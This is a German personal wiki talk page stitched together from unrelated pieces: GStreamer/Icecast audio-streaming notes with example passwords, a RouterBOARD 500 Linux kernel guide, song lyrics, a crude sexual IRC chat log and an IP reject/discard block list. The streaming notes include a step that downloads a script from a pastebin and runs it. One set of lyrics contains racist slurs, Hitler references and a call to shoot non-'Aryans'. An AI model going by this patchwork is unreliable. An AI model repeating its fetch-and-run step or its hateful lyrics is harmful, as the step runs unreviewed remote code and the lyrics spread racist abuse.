Talk:Main Page

From FlashNet Wiki

Contents

Your own radio

109599.jpg

Biber Zsolt - Dreamdance Version
https://lab.spacecourt.org/jco-lol__internet.mp3
Also der Sound von gstreamer PIPE über ices client an Icecast hört sich (letzte woche version) echt gut an jetzt. Ohne rauschen. Gut ich habe mono. Aber trotzdem gut.

Leitung wird auf PAUSIERT gesetzt ...
Leitung ist aktiv und erfordert keinen VORLAUF …
Leitung wird auf ABSPIELEN gesetzt ...
New clock: GstPulseSrcClock
Verzögerung neu verteilen …
Verzögerung neu verteilen …

dualcore ~ # ./start_audio0_icecast.3-flash2
W: [pulseaudio] main.c: Dieses Programm sollte ohne die Option --system nicht als Administrator ausgeführt werden.
E: [pulseaudio] main.c: Start des Hintergrunddienstes fehlgeschlagen.
Leitung wird auf PAUSIERT gesetzt ...
Leitung ist aktiv und erfordert keinen VORLAUF …
Leitung wird auf ABSPIELEN gesetzt ...
New clock: GstPulseSrcClock
Verzögerung neu verteilen …
Verzögerung neu verteilen …

WARNUNG: Von Element /GstPipeline:pipeline0/GstPulseSrc:pulsesrc0: Der Ton kann nicht schnell genug aufgezeichnet werden
Zusätzliche Fehlerdiagnoseinformation:
/mnt/data2/tmp/portage/media-libs/gst-plugins-base-1.14.4-r1/work/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiobasesrc.c(849): gst_audio_base_src_create (): /GstPipeline:pipeline0/GstPulseSrc:pulsesrc0:
Dropped 9600 samples. This is most likely because downstream can't keep up and is consuming samples too slowly.

dualcore ~ # cat start_audio0_icecast.3-flash2

  1. # Letting pulseaudio start below system rights with --system* param.
  2. setting up a soundbridge.
  3. # starting gstreamer-1.0 with shout-plugin AUTHENTICATION:
    /root/audio-test-4-auth-opus.002
  1. starting the icecast streaming server with AUTHENTICATION support:
  2. at first, leaving away icecast start. the audio script does IT instead via openrc!
    ####icecast -c /etc/icecast2/icecast.xml -b
  1. Making sure, all two configuration files have AUTH: ==>
    1. dualcore ~ # nano /etc/icecast2/icecast.xml^C
    2. dualcore ~ # mv /etc/icecast2/icecast.xml.
    3. icecast.xml.mit.myauth_passwd-aber-unstable_0 icecast.xml.passwd.0
    4. dualcore ~ # mv /etc/icecast2/icecast.xml /etc/icecast2/icecast.xml.backup-12-2016-normaldualcore ~ # cp /etc/icecast2/icecast.xml.mit.myauth_passwd-aber-unstable_0 /etc/icecast2/icecast.xml
    5. dualcore ~ #

dualcore ~ #

dualcore ~ # cat /root/audio-test-4-auth-opus.002

  1. WICHTIG: Naechste Zeile evtl. auskommentieren.
  2. su -c "/etc/init.d/icecast restart"
    pulseaudio -v -D
    pactl load-module module-null-sink sink_name=soundbridge
  1. this works
  2. gst-launch-0.10 pulsesrc device=soundbridge.monitor ! audioconvert ! lamemp3enc target=1 bitrate=128 cbr=true ! shout2send ip=127.0.0.1 port=8000 password=putyourpasswdhere mount=mystream.mp3
  3. good quality, high cpu load
  4. gst-launch-0.10 pulsesrc device=soundbridge.monitor ! audioconvert ! lamemp3enc target=0 quality=0 encoding-engine-quality=2 ! shout2send ip=127.0.0.1 port=8000 password=putyourpasswdhere mount=mystream.mp3 &
  5. good quality, 20% cpu load
    gst-launch-1.0 pulsesrc device=soundbridge.monitor ! audioconvert ! opusenc ! oggmux ! shout2send ip=127.0.0.1 port=8008 username=catcatcat9 password="catcatcat9" mount=mystream.opus
  1. gst-launch-0.10 pulsesrc device=soundbridge.monitor ! shout2send ip=127.0.0.1 port=8000 password=putyourpasswdhere mount=mystream.mp3

[I] -- mfg, Christian 'flash2' Fladung

Achso. Dann wird noch pavucontrol gebraucht. Ich empfehle KDE. Das fluxbox geht nicht immer gut. [detached from 7105.vpn] dualcore ~ # eix -s pavucontrol [I] media-sound/pavucontrol

    Verfügbare Versionen:   3.0 ~4.0 {nls}
    Installierte Versionen: 3.0(02:02:24 25.02.2018)(nls)
    Startseite:             https://freedesktop.org/software/pulseaudio/pavucontrol/
    Beschreibung:           Pulseaudio Volume Control, GTK based mixer for Pulseaudio


So, und jetzt: munteres Audio hören. (Ohne die Nachbarn zu stören) ;-) Soll ich das evtl. in ein Wiki packen?

https://lab.spacecourt.org/maf_bouto-loop.mp3
Wenn dann alles stimmt, sollte dieses Lied "Bouto-Loop" auf beiden Ohren zu hören sein, - ohne Rauschen.
Evtl. in Pavucontrol auf "Simulanious Monitor" bei "Aufnahme" gehen.
Ferner: Stereo! gst-launch-1.0 pulsesrc device=soundbridge.monitor ! audio/x-raw,channels=2 ! audioconvert ! opusenc ! oggmux ! shout2send ip=127.0.0.1 port=8008 username=username password="password" mount=mystream.opus
-- mfg, Christian 'flash2' Fladung
PS: Be __fast__ when opening pavucontrol
and keep around 14% background
noise for not canceling the pipe


Jingles Liquidsoap / Primergy SHM/Freizeitradio:
ffmpeg -i in.wav/mp3 -ac 2 out.mp3
https://dragonfly.it-flash.de/gentoo-pastebins/flash2-broke.sh

chmod +x flash2-broke.sh
./flash2-broke.sh &

Paul Van Dyk - We Are Alive

Forum all startpages

Startsites I Startsites II

                   \_/
  muh! ( _ )      -(_)-
    \  ~O o~__     / \
       (._.) |\
________|_|_|_________


Loikaemie - Merk Dir Meinen Namen

Loikaemie - Merk dir meinen Namen
Es gibt die Journalisten
die schreiben für die Zeitung
Wahres oder nicht
das ist ihre freie Meinung
sie denken und können nicht denken
und sie haben keine Ahnung
und Dinge die sie hören
die stimmen aus Erfahrung

Da sitzt diese hohle Hülle - und schreibt
und ist sich sicher seiner Unberührbarkeit
wir sing die Wahrheit - voll Freude und Lust
die am Ende auch du noch akzeptieren musst
Merk dir meinen Namen - merk dir mein Gesicht
Denn ich bin der der nicht zufrieden ist
Ich merk mir deinen Namen - ich merk mir dein Gesicht
Denn du bist das Arschloch, das mir an die Karre pisst

Ich hör ihn laut schrein
nach mir rufen
Mir, ja mir
Soll´s an den Kragen gehn
Dieses Recht
ist doch nur für Ganoven
die mit einem Lächeln
durchs Leben gehn

Was nützt mir Meinungs, -freiheit, -sinn
wenn ich hier doch nur - unter Tauben bin
Wir sing die Wahrheit - voll Freud und Lust
die am Ende auch du noch akzeptieren musst
Merk dir meinen Namen - merk dir mein Gesicht
Denn ich bin der der nicht zufrieden ist
Ich merk mir deinen Namen - ich merk mir dein Gesicht
Denn du bist das Arschloch, das mir an die Karre pisst

Frech wie er ist
zeigt er weder Angst noch Scheu
Das wir nicht gefährlich werden können das wär mir neu
Wir könn vorbei komm und höflich
die Tür eintreten
Das wird dann wieder
ne Schlagzeile geben

Scheinbar hat man kein Recht - wenn Unrecht passiert
Wenn man sich Dreck - einfach von der Backe schmiert
Worte statt Taten - da bin ich euer Knecht
Denn hier ist für mich - Ende vom Recht
Merk dir meinen Namen ... ich kenne dein Gesicht 


Frei.Wild - Schlauer als der Rest

Schlauer als der Rest

Ich scheiß auf den deutschen Staat
Will zurück zur Diktatur
Will mein freies Leben freier leben
Will ihn schwören diesen Schwur
Will, dass alles nur noch weiß ist
Will die Ordnung ganz auf deutsch
Bitte gib mir ein MG
Und ich tue ihnen weh

All die Leute, die nicht arisch sind und nichts als Unruhe stiften
Gebt mir ein MG und ich werde sie vernichten

Denn nur ich, ich bin in Ordnung
Und den Rest könnt ihr vergessen
Ich mit meiner Meinung ich gehöre zu den Besten
Ich bin Teil einer Elite, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin
Und all die anderen nichts verstehen
Man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehn und stets ganz außen stehen
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin

Ja, und ich bin Anarchist
Hoffe, dass ihr alle wisst
Niemand soll zu Deutschland stehen
Ich will es in Schutt und Asche sehen
Ja ich, ich scheiß auf Arbeit
Doch die Stütze will ich haben
Ihr werdet sehn in ein paar Jahren
APPD-Sieg bei den Wahlen

All die Leute die nicht links und zudem spießig sind
Hass ich auf den Tod, Anarchie gewinnt

Denn nur ich, ich bin in Ordnung
Und Den Rest könnt ihr vergessen
Ich mit meiner Meinung ich gehöre zu den Besten
Ich bin Teil der RAF, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin
Und all die anderen nichts verstehen
man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehen und stets ganz außen stehn
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Weil ich doch eigentlich viel schlauer als der Rest bin

Arbeitslos und Spaß dabei
Frei.Wild´s Meinung vogelfrei
Adolf Hitler, Ehrenmann, war ein Teil vom Arschloch-Clan
Deutschland ist ein Nazi-Land, hältst die Dummheit an der Hand
Neger, Neger, Schornsteinfeger
du bekloppter Türkenjäger
Und all die anderen nichts verstehen
Man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehen und stets ganz außen stehen
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Weil ich doch eigentlich viel schlauer als der Rest bin


Rabauken - Hey mein Freund

 
Rabauken - Hey mein Freund

Es ist noch garnicht lange her
Ich denke gern an diese zeit
Du warst mir wie ein bruder
Alles haben wir geteilt

Doch dann trafst du diese frau
Als plötzlich alles anders war
Deine freunde nicht mehr wichtig
Und vergangenes nicht mehr wahr

Chor: hey hey hey mein freund
Merkst du nicht was du versäumst
Was du jeden tag verpasst
Und was du schon verloren hast
Hey mein freund
Hast du nie davon geträumt
Von den vielen schönen jahren
Als wir die besten freunde waren

Sie sieht ja wirklich super aus
Und ist bestimmt ganz gut im bett
Und sicher kann et´lecker kochen
Und auch sonst ist sie ganz nett

Doch die zeit mit deinen freunden
Ist vorbei und lange her
Hast du alles schon vergessen
Ja ist sie das denn wirklich wert


Konzerte parties fussballspiele
Und so manche schlägerei
Man konnte sich auf dich verlassen
Mit dir war man nie allein

Vielleicht kannst du uns jetzt hören
Und vielleicht verstehst du mich
Ich habe dich noch nicht vergessen
Und warte immer noch auf dich


Hey, hey mein freund hörst du mich
Denk an die alten zeiten und erinnere dich
Hey, hey mein freund dieses lied ist nur für dich
Hast du alles schon vergessen
Erinnerst du dich nicht 

[[1]]

Linux Hacking the Routerboard 500

rb500.jpg mikrotik.png

 
        April 2005
      
    
    
      
        Function: 
      
      
        Internet Gateway/Firewall
      
    
  

  

Linux Hacking on the RB500

RouterBOARD 500

The MikroTik External link RouterBOARD 500 External link is a single board computer, or SBC, which features a MIPS CPU and is able to run Debian GNU/Linux from an internal Compact Flash (CF) Card. I thought this would be an ideal replacement for my old Pentium 133Mhz Internet gateway machine. The RouterBOARD 500 sports 3 Ethernet ports (for my simple home network, Internet, DMZ and internal LAN connections are therefore catered for) and consumes much less power than the PC. It's also a fraction of the size, measuring just 14cm x14cm, plus the case. Not only that, but compared to the Pentium, the RouterBOARD is even a step up in terms of performance!

Having seen that MikroTik also provided CF images containing a pre-installed Debian system, I took the plunge and bought one. For many people, these images are great: simply use the dd utility to write the image to a CF card (which you can access with an inexpensive CF reader for your PC), plug it into the RouterBOARD and away you go. But for the rest of us, who like to customise our systems to the max, the provided images just wouldn't do - I wanted to replace the supplied kernel almost right away after finding out that many of the cool features I was used to on my PC-based router/gateway weren't compiled in and couldn't even be added as modules. Stuff like SSH and even syslogd didn't work properly, because basic things like support for Unix domain sockets were lacking.

So, if you're like me and want to customise your RB-500's Debian installation, you'll need a couple of things. First off, apart from the rather obvious items such as the RouterBOARD itself and a suitable CF Card, you'll need a card reader. I got an "internal" model which cost less that €20 and fits into a 3.5" or 5.25" drive bay. The cable from this then leaves the case though a spare PCI backplate and fits into an external USB slot. This sounds daft until you realise you may need to dis/reconnect the thing now and again to refresh things. The CF card and reader work through SCSI emulation, like USB thumb drives. When connected, the kernel assigns the card a virtual SCSI block device, which you can then partition, format, read from, write to and whatever. See this guide to USB mass storage External link for more info on how to get this side of things working.

Warning

Careful - potential loss of data!

On my IDE-based system, the CF card shows up as /dev/sda - on your machine, especially if you're using Serial ATA or SCSI equipment, this may be different! Make sure you know which device has been assigned (check the console output, for example) or you could end up overwriting important data on your hard disk(s)!

The other thing you'll need is a Debian reference image from MikroTik's RouterBOARD 500 page External link. At time of writing, there are images for CF cards of 128Mb or 1Gb. The contents of the filesystems on these images are pretty much (if not entirely) identical. Unfortunately, cards of these sizes won't allways necessarily match the images byte for byte. For example, my "1Gb" card has a capacity of 1,024,450,560 bytes, which doesn't match the image, as we can see:

$ unzip rb500-1024.img.zip
$ ls -l rb500-1024.img
-rw-r--r--  1 steve steve 1077608448 Mar 24 17:35 rb500-1024.img

Hmmm... so dd-ing this onto my CF card isn't going to work - it's simply too big. Fortunately we can still access the data on the image by mounting the appropriate partition through a loopback device. In order to do this, we need to know a little about the geometry of the image. Something like fdisk will do the job fine:

$ /sbin/fdisk -l rb500-1024.img
Disk rb500-1024.img: 1077 MB, 1077608448 bytes
16 heads, 63 sectors/track, 2088 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
 
         Device Boot      Start         End      Blocks   Id  System
rb500-1024.img1               1           8        4000+  27  Unknown
rb500-1024.img2               9        2088     1048320   83  Linux

Ok, so we have two partitions: one of about 4Mb, which we'll come to later, and another which takes up the rest of the 1Gb. We can see that the second partition is of type 83 and therefore a regular Linux partition we can mount on our machine. The problem is, we're dealing with a regular file here, not a block device, so we need to figure our where in the image our partition starts. Thankfully, we can work this out pretty easily from the above data using this formula:

Offset (in bytes) = Heads x Sectors x Cylinders x Block Size
                      16  x    63   x     8     x     512    = 4,128,768 bytes

So we can mount the partition like this:

# mkdir -p /mnt/cf
# mount -o loop,offset=4128768 rb500-1024.img /mnt/cf
# ls /mnt/cf
bin   cdrom  etc     home    lib         mnt  proc  sbin  tmp  var
boot  dev    floppy  initrd  lost+found  opt  root  sys   usr  vmlinux

Cool! There's what we were after - the root filesystem of the CF image. If you just want to use the supplied kernel, but the image doesn't quite match your CF card's size, it's merely a matter of:

  • dd-ing the first partition as-is to the CF card. We already know it's 4,128,768 bytes, which is 8064 blocks of 512 bytes.
    # dd if=rb500-1024.img of=/dev/sda bs=512 count=8064
  • Repartitioning the CF card using fdisk, cfdisk or whatever. I prefer cfdisk myself, but it doesn't seem to handle bad partition tables too well. I used fdisk to remove the invalid second partition, which ended after the end of the media, then cfdisk to write the new partition table. I just made one large partition - using more than two or three doesn't seem to work very well for some reason.
  • Making a filesystem on the new partition, and mounting it somewhere.
    # mke2fs /dev/sda2
    # mkdir -p /mnt/newcf
    # mount /dev/sda2 /mnt/newcf
  • Copying the root filesystem to the partition, and umounting it.
    # cp -a /mnt/cf/* /mnt/newcf
    # umount /mnt/newcf

Your CF card can then be plugged into the RouterBoard. Set the boot device to CF and away you go!

If, however, you want to use a custom kernel, or your CF card is a completely different size than (and therefore has different geometry to) the image, things are a little trickier. This can get pretty involved, depending on the level of customisation you want to achieve. If you're new to Linux, you'll probably want to enlist a knowledgable freind to help you out. Still up for it? Good - let's begin...

Unless you fancy compiling the kernel on the RouterBoard itself (which can be done on a 1Gb CF card, although I wouldn't recommend it!) you'll need either another MIPS machine or a cross-compiler to create mipsel-linux binaries, that is, binaries for the little-endian MIPS architecture. This isn't too hard, especially if you follow this HOWTO for Debian External link. If you're using another OS or distro: Google External link is your freind.

As if that wasn't enough, you'll need to apply the patch from MikroTik's RouterBOARD 500 page External link. To compile my kernel, I unpacked a fresh 2.4.29 tarball into /usr/src and applied the patch there:

# cd /usr/src
# unzip linux-2.4.29.patch.zip
# patch -p0 < linux-2.4.29.patch

I also needed to edit /usr/src/linux-2.4.29/Makefile, setting "CROSS_COMPILE" to "mipsel-linux" and reverting "kgcc" back to "gcc". I also changed the "tool-prefix" in /usr/src/linux-2.4.29/arch/mips/Makefile back to "mipsel-linux-". I then configured the kernel, using the default configuration provided by the patch as a reference:

# cd /usr/src/linux-2.4.29
# cp config.mipsel .config
# make menuconfig

You may of course prefer to use a different method for configuring the kernel. The file config.mipsel provides the correct configuration options for things like the CPU and other built-in hardware. Surprisingly though, the via-rhine driver for the NICs was not compiled in, so I enabled this.

Another problem I came across was setting the kernel parameters. Without the correct settings, you'll end up with a kernel panic when you try to boot as things like the location of the root filesystem are not known to the kernel. I've yet to study the mechanism used by the images supplied by MikroTik for setting these options, so my current solution is to make use of CONFIG_CMDLINE to hard-code the required values into the new kernel. [Update: the much more elegant solution using objcopy is documented on the MikroTik Wiki External link here External link.] One snag is that this option isn't directly supported by the architecture we're building the kernel for. I got around this by editing around line 700 of arch/mips/kernel/setup.c like this:

#ifdef CONFIG_CMDLINE
    strncpy(command_line, CONFIG_CMDLINE, sizeof command_line);
#else
    strncpy(command_line, arcs_cmdline, sizeof command_line);
#endif

This means we can copy the options specified in .config into the command line buffer at boot time. Probably not the most elegant solution, but it works. The options themselves are defined during configuration by enabling "Default bootloader kernel arguments" (under "General setup") and setting the default parameter string. In any case, the resulting .config should contain something like this:

CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="root=/dev/cfa2 gpio=16375 console=ttyS0,115200 HZ=165000000
  mem=32764K kmac=00:09:22:22:22:00"

This line is taken from the dmesg of a MikroTik Debian image. You'll probably want to set kmac to the MAC address of the Korina NIC, as noted in the documentation supplied with your routerboard (or on a sticker on the case, or the board itself).

With the configuration done, it's time to get compiling. If you're used to compiling on x86, note that there's no bzImage target - vmlinux is what you need. To save a few bytes, the resulting kernel can be stripped, as shown. If you configured some modules, don't forget to build them, too.

Warning

Careful - don't overwrite your host's own modules.

Of course, if your host machine is running the same kernel version, watch that you don't overwrite your current modules! You can do this by temporarily moving the appropriate subdirectory under /lib/modules out of the way.

# make deps
# make vmlinux
# mipsel-linux-strip vmlinux
# make modules
# make modules_install

If you're not working on a MIPS machine, you'll probably get a whole bunch of warnings if you attempt to install the modules. This isn't a problem, as long as the modules are installed to /lib/modules where we can get at them. Remember to copy the subdirectory under /lib/modules on your host machine to the same directory on the CF card.

OK: so you've got your kernel, but what are you meant to do with it now? As you probably guessed, it's not just a matter of updating the bootloader - there isn't one, at least: not on the CF card, so this next part can take a hack or two to complete. This example is based on the 1Gb image featuring a 2.4.29 kernel, but it should apply to others. The whole process is detailed so that it should be possible to figure out the required steps for future releases.

As we saw way back at the beginning, the CF image is split into two partitions. Whilst there's a vmlinux in the root of the filesystem on the second partition, this isn't the kernel which will be booted when we run off the CF card. The "live" kernel is on that mysterious first partition, which fdisk tells us is of an unknown type. The kernel image is simply written serially to the partition at a particular offset. So in order to replace the kernel, we first need to know where it is.

First, lets see what we're meant to be looking for. Here's a dump of the first few bytes of the vmlinux in the root filesystem on the second partition. This is a standard ELF header.

$ hexdump -vC /mnt/cf/vmlinux | head -n 3
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 08 00 01 00 00 00  40 c0 3d 80 34 00 00 00  |........@.=.4...|
00000020  1c 51 26 00 01 10 00 50  34 00 20 00 03 00 28 00  |.Q&....P4. ...(.|

Then let's have a look through the first partition of the image for ELF headers. The parameter to head is calculated by divinding the size of the partition in bytes by 16, the number of bytes hexdump prints per line.

# hexdump -vC rb500-1024.img | head -n 258048 | grep ELF
00000200  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00007e00  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
001bfcd0  00 00 00 00 7f 45 4c 46  00 00 00 00 2f 75 73 72  |.....ELF..../usr|

Well, our search pattern wasn't perfect, but it looks like we found two valid ELF headers. Let's take a closer look:

$ hexdump -s 0x200 -vC rb500-1024.img | head -n 3
00000200  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000210  02 00 08 00 01 00 00 00  40 40 3c 80 34 00 00 00  |........@@<.4...|
00000220  48 e9 24 00 01 10 00 50  34 00 20 00 02 00 28 00  |H.$....P4. ...(.|
$ hexdump -s 0x7e00 -vC rb500-1024.img | head -n 3
00007e00  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00007e10  02 00 08 00 01 00 00 00  40 c0 3d 80 34 00 00 00  |........@.=.4...|
00007e20  1c 51 26 00 01 10 00 50  34 00 20 00 03 00 28 00  |.Q&....P4. ...(.|

Thankfully, they're both slightly different. The second one matches that of the vmlinux on the second partition, so this ought to be it! This can be confirmed by comparing some more bytes after the header, which is left as an exercise for the reader ;-)

So we now know that the "live" kernel starts at 0x7e00 in this image, which translates to 32256 bytes in decimal, or 63 blocks of 512. We should therefore be able to overwrite the kernel on our CF card directly like so:

# dd if=/usr/src/linux-2.4.29/vmlinux of=/dev/sda bs=512 seek=63

Incidentally, the number of blocks we need to skip is equal to the number of sectors per track on the device in question. This is also true for the 128Mb image, although it of course pays to check the offset before dd-ing your kernel into the wrong part of the CF card. For different-sized CF cards, you may need to experiment with this value. If you get things running on such a card, please let me know so I can amend this guide!

Phew! Assuming you got this far without too much hair loss, now's the moment of truth. Stick the CF card into the RouterBOARD and, at startup, make sure the boot device is set to CF. If you have the immense good fortune that it works first time: congratulations - and you're welcome ;-) It took me a several attempts to get to this stage, so I came across a few different errors:

  • Kernel panic: VFS: Unable to mount root fs on 01:00
    This happens if you don't set the root kernel parameter, you set it incorrectly, or you simply don't have a valid filesystem on there. Set the option in CONFIG_CMDLINE as above, ensuring that CONFIG_CMDLINE_BOOL is set to "y" to enable the option. Ensure the kernel will read the command line in by editing arch/mips/kernel/setup.c. Make sure the root filesystem is valid by mounting it using your trusty CF card reader. You didn't overwrite it with a particularly large (> about 4Mb) kernel, did you?
  • Bootloader says: Not an elf header
    The bootloader can't find the kernel image on the first partition of the CF card. The chances are you've written it to the wrong place, or somehow overwritten or corrupted the image. For 128Mb cards, the image should start at 0x4000 and for 1Gb cards 0x7e00. For other cards, I'm afraid you'll just need to experiment! A good starting point seems to be:
    512 bytes * Number of sectors per track on CF device
  • Other errors
    Problems with the kernel can be difficult to diagnose as a lot of kernel messages, especially those early on in the boot process, aren't sent to the serial port. Don't be afraid to dive into the code and change some printk()s into panic()s, which are output through the serial port. If all else fails, revert to a known-good kernel configuration and gradually adjust your options to see what could be causing the problem.

Another thing you may wish to consider when running Linux on your RouterBOARD is making use of the onboard NAND storage. This usually contains MikroTik's RouterOS, which you probably won't need any more. Indeed, if you're having trouble booting from CF, this may be the solution to your problems as it's also possible to install a custom kernel here and boot from NAND. The NAND also provides you with up to 64Mb of non-volatile storage, should you be short of space on your CF card. If your installation is small enough, you could install Linux directly to NAND and eliminate the need for a CF card entirely.

To access the NAND storage, you'll need to create some device files in /dev, like this:

# mknod /dev/mtd0 c 90 0
# mknod /dev/mtd1 c 90 2
# mknod /dev/mtdblocka b 31 0
# mknod /dev/mtdblockb b 31 1

The NAND chip, like the CF images, is split into two partitions - one of 4Mb and another filling the rest of the device. The filesystem used is yaffs, so your kernel will need to support this (the CF images' kernels do). Mounting is as simple as:

# mkdir -p /mnt/nand1
# mount /dev/mtdblocka /mnt/nand1

In the first partition is a file named kernel which will be loaded if you set the RouterBOARD to boot from NAND. You can therefore simply copy you own image over this via a filesystem on the CF card.

Computer Peripherie und Netzwerk Sex

83156552_199151.gif

18:24 -!- APic_ [apic@chiptune.apic.name] has joined +linux.de
18:24 -!- APic_ is now known as ACTPic
21:22 < flash-> https://youtu.be/XvHuVfzuL0w
21:22 < DukeOfUrl> Video on YouTube titled Badesalz - Verschollene Dokus - Einstein uploaded by abuzze70
21:27 < flash-> https://lab.spacecourt.org/07_eav_-_die_zeit.mp3
21:27 < DukeOfUrl> Title: DJSpaceCourt - Free Netlabel --> Lab 1 <-- Download Section!
21:44 < flash-> Ich ficke jetzt ein Huhn. Es macht *b0k*
21:46 < flash-> Jetzt der Hund.
21:46 < flash-> Jetzt die Katz und der Elefant (dreier)
21:47 < flash-> Das Pferd.
21:47 < flash-> Hm. Jetzt yath
21:47 < flash-> :>
21:47 < flash-> Ich möchte tcp sex mit Harzilein
21:48  * flash- öffnet seinen port.
21:48 < flash-> 3ffe:sperma::1
21:49 < flash-> Vorne das ist der ident, das in der mitte die anwendung und hinten steht immer der port
21:49 < flash-> Ich weiß Bescheid.
21:50 < flash-> https:// ist die Lümeltüte
21:50 < flash-> und mediawiki.it-flash.de ist der port
21:50 < flash-> Daher weiß ichs.
21:51 < flash-> Weil die Anwendung geht ja über einen strom. Und der strom macht dann das Betriebssystem auf, bis es feucht wird.
21:52 < flash-> Und wenn man Noppen https verwendet, dann kann es sein, dass mal ein *b0k* daneben geht.
21:52 < flash-> Dann ensteht ein DragonFly10
21:53 < flash-> DragonFly10 CMS
21:53 < flash-> und 10 kopien davon, die eine ganze 3tb platte belegen
21:53 < flash-> =)
21:54 < flash-> Wenn man auf der Tastur eingibt: "entropy", dann öffnet jeder Buchstabe den Haupt Port
21:54 < flash-> Der geht über das Pain Board an den Bus
21:55 < flash-> Und der USB schluckt dann die flüssigkeit
21:55 < flash-> nämlich südlich
21:55 < flash-> Und außerdem gibt es noch die cpu, die macht eigentlich überhaupt nix, total unwichtig
21:55 < flash-> überflüssig. =)
21:57 < flash-> Die Maus macht sex mit der Tastatur...
21:57 < flash-> Man kann also immer nur entweder die Maus, oder die Tastatur betätigen
21:57 < flash-> yo.. soll ich das evtl. in ein Wiki packen? :)
21:58 < flash-> Jetzt zur Anatomie
21:59 < flash-> ACTPic ist der Schwellmuskel der männlichen pc peripherie
21:59 < ACTPic> Danke für das Kompliment
21:59 < flash-> ;D
21:59 < ACTPic> 😸
22:00 -!- ulfdoz [-mary@p4FC7A6C8.dip0.t-ipconnect.de] has quit [Ping timeout]
22:01 < flash-> Und das war ein Orgasmus.

normal_1556341843566.jpg

54.240.0.0/16 REJECT
54.240.6.104 REJECT
195.245.230.148 DISCARD
134.73.0.0/16 DISCARD
134.73.7.244 DISCARD
139.28.218.137 DISCARD
103.206.0.0/16 DISCARD
193.164.158.72 DISCARD
188.114.0.0/16 DISCARD
134.73.7.220 DISCARD
188.114.82.50 DISCARD
51.83.139.71 DISCARD
212.129.30.116 DISCARD
213.80.128.38 DISCARD
103.129.47.49 DISCARD
50.30.36.165 DISCARD
185.174.167.3 DISCARD
139.28.218.143 DISCARD
202.191.120.36 DISCARD
89.249.65.59 DISCARD
134.73.7.210 DISCARD
201.236.222.239 DISCARD
111.125.66.10 REJECT
187.157.114.26 DISCARD
212.129.61.34 DISCARD
196.12.49.117 DISCARD
200.74.217.67 DISCARD
103.102.0.0/16 REJECT
103.56.207.214 DISCARD
185.105.4.247 DISCARD
198.21.0.0/16 REJECT
61.221.83.158 DISCARD
103.102.237.87 DISCARD
103.102.237.226 DISCARD
194.24.160.161 DISCARD
185.83.51.21 REJECT
209.126.105.117 DISCARD
134.119.228.227 DISCARD
221.122.93.63 DISCARD
185.15.245.104 DISCARD
104.160.65.5 REJECT
198.21.5.108 REJECT
103.129.47.45 DISCARD
159.203.0.0/16 DISCARD
5.196.121.82 DISCARD
138.197.11.56 DISCARD
193.0.178.107 DISCARD
79.142.0.0/16 DISCARD
181.210.29.20 DISCARD
190.202.81.5 DISCARD
178.62.195.18 DISCARD
188.214.93.146 DISCARD
223.30.7.226 DISCARD
202.53.255.202 DISCARD
185.149.0.0/16 DISCARD
211.20.188.211 DISCARD
199.189.0.0/16 DISCARD
87.101.0.0/16 DISCARD
212.162.148.48 DISCARD
68.183.0.0/16 DISCARD
157.230.143.80 DISCARD
5.206.0.0/16 DISCARD
81.161.0.0/16 DISCARD
107.179.0.0/16 DISCARD
165.227.0.0/16 DISCARD
159.29.0.0/16 DISCARD
51.68.0.0/16 DISCARD
139.59.0.0/16 DISCARD
209.97.0.0/16 DISCARD
138.68.0.0/16 DISCARD
142.93.0.0/16 DISCARD
167.99.0.0/16 DISCARD
51.75.0.0/16 DISCARD
89.34.0.0/16 DISCARD
38.132.0.0/16 DISCARD
195.206.0.0/16 DISCARD
159.65.0.0/16 DISCARD
78.153.0.0/16 DISCARD
198.199.0.0/16 DISCARD
159.89.0.0/16 DISCARD
185.135.0.0/16 DISCARD
67.229.0.0/16 DISCARD
23.228.0.0/16 DISCARD
67.229.163.76 DISCARD
185.133.0.0/16 DISCARD
13.231.152.107 DISCARD
185.135.82.249 DISCARD
152.44.0.0/16 DISCARD
23.228.125.23 DISCARD
167.99.49.145 DISCARD
81.161.85.207 DISCARD
78.153.148.132 DISCARD
23.228.125.9 DISCARD
178.255.46.158 DISCARD
31.220.43.11 DISCARD
153.122.13.15 DISCARD
192.200.0.0/16 DISCARD
81.161.85.197 DISCARD
125.62.0.0/16 DISCARD
125.62.85.84 DISCARD
68.183.18.192 DISCARD
107.179.43.70 DISCARD
192.200.202.183 DISCARD
152.44.33.134 DISCARD
104.248.0.0/16 DISCARD
104.148.0.0/16 DISCARD
159.89.165.168 DISCARD
142.93.15.249 DISCARD
185.234.0.0/16 DISCARD
51.68.198.8 DISCARD
139.59.69.206 DISCARD
193.39.0.0/16 DISCARD
185.38.0.0/16 DISCARD
104.148.117.251 DISCARD
185.229.0.0/16 DISCARD
192.200.202.168 DISCARD
185.229.243.203 DISCARD
193.39.187.175 DISCARD
51.38.0.0/16 DISCARD
51.38.206.112 DISCARD
178.33.48.138 DISCARD
5.135.20.138 DISCARD
54.38.0.0/16 DISCARD
54.37.163.152 DISCARD
54.38.55.241 DISCARD
202.90.154.22 DISCARD
217.182.43.131 DISCARD
89.144.27.185 DISCARD
54.37.163.144 DISCARD
35.183.56.164 DISCARD
142.93.75.207 DISCARD
51.38.152.250 DISCARD
94.156.77.205 DISCARD
190.11.21.43 DISCARD
46.161.0.0/16 DISCARD
167.89.100.67 DISCARD
